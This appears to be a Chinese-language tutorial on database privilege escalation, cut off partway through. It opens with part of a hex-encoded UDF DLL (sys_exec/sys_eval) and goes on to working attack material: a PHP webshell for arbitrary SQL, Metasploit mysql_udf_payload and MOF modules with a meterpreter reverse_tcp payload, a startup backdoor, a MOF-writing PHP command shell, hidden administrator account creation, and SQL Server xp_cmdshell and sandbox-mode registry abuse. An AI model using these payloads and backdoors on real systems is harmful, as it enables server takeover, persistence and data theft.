1B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF0300004C8BC78BD3488BCE488B5C2430488B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
          
          
           }
          
          
          
          
           ?>
          
        2. 以下是要过本地限制连接mysql数据库显示并执行的php代码:

          <?php
          $host = 'localhost';
          $username = 'root';
          $password = '123456'; // 注意:出于安全考虑,避免在代码中明文存储密码
          $conn = new mysqli($host, $username, $password);
          
          if ($conn->connect_error) {
              die("连接失败: " . $conn->connect_error);
          }
          $conn->set_charset("utf8mb4");
          
          $response = [];
          
          if ($_SERVER["REQUEST_METHOD"] === "POST") {
              $action = $_POST['action'];
              $database = $_POST['database'];
              if ($database) {
                  $conn->select_db($database);
              }
          
              switch ($action) {
                  case 'getTables':
                      $sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = '$database'";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row['table_name'];
                      }
                      break;
                  case 'getColumns':
                      $table = $_POST['table'];
                      $sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = '$database' AND table_name = '$table'";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row['column_name'];
                      }
                      break;
                  case 'getRows':
                      $table = $_POST['table'];
                      $column = $_POST['column'];
                      $sql = "SELECT `$column` FROM `$table`";
                      $result = $conn->query($sql);
                      while ($row = $result->fetch_assoc()) {
                          $response[] = $row[$column];
                      }
                      break;
                  case 'executeSQL':
                      $sql = $_POST['sql'];
                      $result = $conn->query($sql);
                      if ($result === true) {
                          $response['success'] = "执行成功";
                      } else if ($result) {
                          while ($row = $result->fetch_assoc()) {
                              $response[] = $row;
                          }
                      } else {
                          $response['error'] = "错误: " . $conn->error;
                      }
                      break;
              }
          
              $conn->close();
              echo json_encode($response);
              exit;
          }
          
          $databases = [];
          $result = $conn->query("SHOW DATABASES");
          while ($row = $result->fetch_assoc()) {
              $databases[] = $row['Database'];
          }
          $conn->close();
          ?>
          <!DOCTYPE html>
          <html lang="zh-CN">
          <head>
          <meta charset="UTF-8">
          <title>CongSec</title>
          <style>
              body { font-family: Arial, sans-serif; }
              .container {
                  display: flex;
                  flex-wrap: wrap;  /* 允许子项在必要时换行 */
                  align-items: center; /* 中心对齐子项 */
                  padding: 10px;
              }
              button {
                  margin: 5px;
                  padding: 8px 16px;
                  background-color: #4CAF50;
                  color: white;
                  border: none;
                  border-radius: 4px;
                  cursor: pointer;
                  min-width: 120px; /* 最小宽度 */
                  white-space: nowrap; /* 防止文字在按钮内换行 */
              }
              button:hover {
                  background-color: #45a049;
              }
              div {
                  margin: 5px;
              }
              textarea {
                  width: 95%; /* 调整宽度以适应屏幕 */
                  height: 150px; /* 调整高度 */
                  margin: 5px;
              }
          </style>
          <script>
          function fetchTables(database) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getTables&database=' + encodeURIComponent(database)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('tables');
                  container.innerHTML = '';
                  data.forEach(table => {
                      const div = document.createElement('div');
                      const button = document.createElement('button');
                      button.textContent = table;
                      button.onclick = () => fetchColumns(database, table);
                      div.appendChild(button);
                      container.appendChild(div);
                  });
              });
          }
          
          function fetchColumns(database, table) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getColumns&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('columns');
                  container.innerHTML = '';
                  data.forEach(column => {
                      const div = document.createElement('div');
                      const button = document.createElement('button');
                      button.textContent = column;
                      button.onclick = () => fetchRows(database, table, column);
                      div.appendChild(button);
                      container.appendChild(div);
                  });
              });
          }
          
          function fetchRows(database, table, column) {
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=getRows&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table) + '&column=' + encodeURIComponent(column)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('rows');
                  container.innerHTML = '';
                  data.forEach(value => {
                      const div = document.createElement('div');
                      div.textContent = value;
                      container.appendChild(div);
                  });
              });
          }
          
          function executeSQL() {
              const sql = document.getElementById('sqlText').value;
              fetch('', {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded',
                  },
                  body: 'action=executeSQL&sql=' + encodeURIComponent(sql)
              })
              .then(response => response.json())
              .then(data => {
                  const container = document.getElementById('sqlResult');
                  container.innerHTML = '';
                  if (data.error) {
                      container.textContent = data.error;
                  } else if (data.success) {
                      container.textContent = data.success;
                  } else {
                      data.forEach(row => {
                          const div = document.createElement('div');
                          div.textContent = JSON.stringify(row);
                          container.appendChild(div);
                      });
                  }
              });
          }
          </script>
          </head>
          <body>
          <h1>选择数据库</h1>
          <div class="container" id="databases">
          <?php foreach ($databases as $db): ?>
              <button onclick="fetchTables('<?php echo $db; ?>')"><?php echo $db; ?></button>
          <?php endforeach; ?>
          </div>
          <h2>表信息</h2>
          <div class="container" id="tables"></div>
          <h2>列信息</h2>
          <div class="container" id="columns"></div>
          <h2>字段信息</h2>
          <div class="container" id="rows"></div>
          <h2>执行SQL</h2>
          <div class="container" id="executeSQL">
              <textarea id="sqlText"></textarea>
              <button onclick="executeSQL()">执行</button>
          </div>
          <h2>SQL执行结果</h2>
          <div class="container" id="sqlResult"></div>
          </body>
          </html>
          
        3. 访问该脚本,输入数据库的账号和密码

          1. image
        4. 点击导出可以在目标主机的脚本提示目录中发现有udf.dll文件生成

          1. image
          2. image
        5. 将dll文件绑定sys_eval函数

          1. image
        6. 使用select cmdshell('whoami')命令可以看到是系统管理员身份

          1. image
      2. 只有数据库权限

        1. 条件
          1. 数据库外联开启

          2. secure-file-priv没进行目录限制

            1. image
          3. 具有数据库帐号密码

        2. 复现
          1. 靶场:php 5.4.45 apche 2.4.23 iis win2008 mysql 5.5.53

          2. 首先我们要创建一个模拟可以外联的sql数据库来模拟攻击者已经获取了一个普通用户的数据库,以下是开启外联的步骤

            1. 在mysql数据库中主机为%即为容许所有主机来连接

              1. image

              2. 成功连接

                1. image
          3. msf工具
            1. udf生成的文件路径:

              1. mysql5.2导出目录c:/windows或system32

              2. mysql=5.2导出安装目录/lib/plugin/

                1. image
              3. 安装目录

                1. image
            2. 通过msf工具生成eqoWcBgh.dll文件

              1.  use exploit/multi/mysql/mysql_udf_payload
                 set payload windows/meterpreter/reverse_tcp 
                 set password root
                 set  rhosts 192.168.72.139
                 run
                
              2. image
            3. 创建函数绑定dll

              1. image
            4. 可以执行任意命令,拿下webshell

              1. image
            5. 利用msf执行以下命令来创建启动项开机自启后门

              1.  use exploit/windows/mysql/mysql_start_up 
                 set rhosts 192.168.72.139
                 set username root
                 set password root 
                 run
                
              2. image
          4. sql语句提权
            1. 在数据库中执行一下脚本即可拿到system权限

              1. image
    2. MOF提权

      1. 前言
        1. mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。【MOF提权只能用于Windows系统提权,Linux提权无法使用】
        2. xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
      2. 条件
        1. mysql有读写 C:/Windows/system32/wbem/mof 的权限
        2. secure-file-priv参数不为null
        3. 适用于win2003更早的版本
      3. 复现
        1. msf工具
          1. 使用msf工具来提权即可

            1.  use exploit/windows/mysql/mysql_mof
              
               # 设置payload
               set payload windows/meterpreter/reverse_tcp
              
               # 设置目标 MySQL 的基础信息
               set rhosts 192.168.72.139
               set username root
               set password root
               run
              
        2. php脚本提权
          1. 将脚本通过文件上传到可访问路径并用数据库账号和密码进行连接即可

            1. image

            2. 提权脚本:

              1.  <?php 
                 $path="c:/ini.txt"; 
                 session_start(); 
                 if(!empty($_POST['submit'])){ 
                 setcookie("connect"); 
                 setcookie("connect[host]",$_POST['host']); 
                 setcookie("connect[user]",$_POST['user']); 
                 setcookie("connect[pass]",$_POST['pass']); 
                 setcookie("connect[dbname]",$_POST['dbname']); 
                 echo "<script>location.href='?action=connect'</script>"; 
                 } 
                 if(empty($_GET["action"])){ 
                 ?> 
                
                 <html> 
                 <head><title>Win MOF Shell</title></head> 
                 <body> 
                 <form action="?action=connect" method="post"> 
                 Host: 
                 <input type="text" name="host" value="127.0.0.1"><br/> 
                 User: 
                 <input type="text" name="user" value="root"><br/> 
                 Pass: 
                 <input type="password" name="pass" value="root"><br/> 
                 DB:   
                 <input type="text" name="dbname" value="mysql"><br/> 
                 <input type="submit" name="submit" value="Submit"><br/> 
                 </form> 
                 </body> 
                 </html> 
                
                 <?php 
                 exit; 
                 } 
                 if ($_GET[action]=='connect') 
                 { 
                 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                 echo "<form action='' method='post'>"; 
                 echo "Cmd:"; 
                 echo "<input type='text' name='cmd' value='$strCmd'?>"; 
                 echo "<br>"; 
                 echo "<br>"; 
                 echo "<input type='submit' value='Exploit'>"; 
                 echo "</form>"; 
                 echo "<form action='' method='post'>"; 
                 echo "<input type='hidden' name='flag' value='flag'>"; 
                 echo "<input type='submit'value=' Read  '>"; 
                 echo "</form>"; 
                 if (isset($_POST['cmd'])){ 
                 $strCmd=$_POST['cmd']; 
                 $cmdshell='cmd /c '.$strCmd.'>'.$path; 
                 $mofname="c:/windows/system32/wbem/mof/system.mof"; 
                 $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 
                
                 instance of __EventFilter as \$EventFilter 
                 { 
                   EventNamespace = \"Root\\\\\\\\Cimv2\"; 
                   Name  = \"filtP2\"; 
                   Query = \"Select * From __InstanceModificationEvent \" 
                       \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 
                       \"And TargetInstance.Second = 5\"; 
                   QueryLanguage = \"WQL\"; 
                 }; 
                
                 instance of ActiveScriptEventConsumer as \$Consumer 
                 { 
                   Name = \"consPCSV2\"; 
                   ScriptingEngine = \"JScript\"; 
                   ScriptText = 
                   \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
                 }; 
                
                 instance of __FilterToConsumerBinding 
                 { 
                   Consumer = \$Consumer; 
                   Filter = \$EventFilter; 
                 };"; 
                 mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
                 $sql1="select '$payload' into dumpfile '$mofname';"; 
                 if(mysql_query($sql1)) 
                   echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
                 mysql_close($conn); 
                 } 
                
                 if(isset($_POST['flag'])) 
                 { 
                   $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                   $sql2="select load_file(\"".$path."\");"; 
                   $result2=mysql_query($sql2); 
                   $num=mysql_num_rows($result2); 
                   while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 
                     echo "<hr/>"; 
                     echo '<pre>'. $row[0].'</pre>'; 
                   } 
                   mysql_close($conn); 
                 } 
                 } 
                 ?>
                
          2. 连接上即可执行任意命令

            1. image
          3. 接下来就进行权限的维持

            1. 创建隐藏用户net user cong$ 12456 /add & net localgroup administrators cong$ /add
            2. image
    3. sqlserver提权

      1. 前言

        1. 在SQL Server中,如果攻击者能够获取到sa(系统管理员)账户的密码,那么他们实际上已经拥有了非常高的权限,因为sa账户是SQL Server中的超级用户,具有对数据库服务器的完全控制权。

        2. 关于执行操作系统命令的权限,特别是通过SQL Server的 xp_cmdshell或其他机制,这取决于SQL Server的配置以及运行SQL Server的 Windows操作系统账户的安全设置。

        3. 敏感文件名称

          1.  web.config 
             config.asp 
             conn.aspx 
             database.aspx
            
      2. 条件

        1. 服务器开启数据库服务
        2. 获取到最高权限用户密码
          (除Access数据库外,其他数据库基本都存在数据库提权的可能)
      3. xp_cmdshell提权

        1. 复现
          1. 通过连接数据库执行数据库语句

            1. 开启xp_cmdshell命令

              1.  EXEC sp_configure 'show advanced options', 1
                 RECONFIGURE;
                 EXEC sp_configure 'xp_cmdshell', 1;
                 RECONFIGURE;
                
            2. 执行命令语句EXEC master.dbo.xp_cmdshell 'whoami'即可

      4. 沙盒提权

        1. 介绍
          1. 沙盒模式是数据库的一种安全功能。在沙盒模式下,只对控件和字段属性中的安全且不含恶意代码的表达式求值。如果表达式不使用可能以某种方式损坏数据的函数或属性,则可认为它是安全的。利用前提需要sqlserver sysadmin账户服务器权限为system(sqlserver2019默认被降权为mssql),服务器拥有 jet.oledb.4.0 驱动。

          2. 局限:(1)Microsoft.jet.oledb.4.0一般在32位操作系统上才可以 (2)Windows 2008以上 默认无 Access 数据库文件, 需要自己上传 sqlserver2015默认禁用Ad Hoc Distributed Queries,需要开启。

          3. 沙盒模式SandBoxMode参数含义(默认是2)

            0:在任何所有者中禁止启用安全模式

            1 :为仅在允许范围内

            2 :必须在access模式下

            3:完全开启

        2. 复现
          1. 执行以下两条命令,启用高级选项

            1.  exec sp_configure 'show advanced options',1;reconfigure;
               exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
              
          2. 修改注册表

            1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
          3. 使用 SQL Server 的扩展存储过程 xp_regread 来从 Windows 注册表中读取 SandBoxMode 键的值。

            1. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';
          4. 执行系统命令

            1.  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')
               select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')
              
          5. 恢复配置

            1.  exec master..xp_regwrite 'HKEY_LOCALMACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
               exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
               exec sp_configure 'show advanced options',0;reconfigure;
              

Oracle提权

  1. 靶场搭建

    1. 准备一个oracle环境的靶场

    2. 进入数据库sqlplus/nolog

    3. 连接数据库用户conn/as sysdba

    4. 创建一个低权限用户create user test identified by test;

      1. image
    5. 还有获得有java权限

      1.  DECLARE
        
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        
             CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<<ALL
        
          FILES>>', 'execute', 'ENABLED' FROM DUAL;
        
             BEGIN
        
             OPEN C1;
        
             FETCH C1 BULK COLLECT INTO POL;
        
             CLOSE C1;
        
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
        
             END;
        
            /
        
    6. 如果想要执行任意代码的话还需要额外获得java.lang.RuntimePermission权限

      1.  DECLARE
        
